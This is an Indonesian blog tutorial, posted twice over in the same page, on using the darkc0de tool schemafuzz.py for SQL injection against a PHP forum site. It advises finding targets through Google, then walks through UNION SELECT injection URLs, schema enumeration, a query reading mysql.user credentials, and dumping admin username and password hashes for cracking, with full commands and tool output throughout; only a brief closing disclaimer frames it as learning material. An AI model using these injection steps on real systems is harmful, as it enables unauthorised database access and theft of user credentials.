Sabtu, 07 Agustus 2010

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py

by :andre81
Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut pertama-tama kita cari target dengan google dan ditemukan: misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini

./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama
——————
/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

langkah kedua
————–
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga
—————
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_bo
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs
akan tampil seperti ini

Artikel Community

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py
Oleh andre81
Published: Desember 2, 2008
Updated: Desember 6, 2008
Print

Tutorial SQL Injection dengan Menggunakan Schemafuzz

-----------------------------------------------------

Author : Andr3^81

e-Mail : andr3-81 [at] linuxmail [dot] org

website : http://andr381.tk

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

--------------

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

---------------

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhos
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya
——————–
cara untuk menemukan user dan password kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….jreennnng….keluar deh user ama passwordnya
hasilnya dibawah ini

+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

angan lupa kita selalu mengecek schemafuzzlog.txt nya setelah itu tinggal kita meng crack passwordnya pake program gemana rekan2 gampang kan pake schemafuzz

NB:
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya…

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai embelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.
a

Tidak ada komentar:


ShoutMix chat widget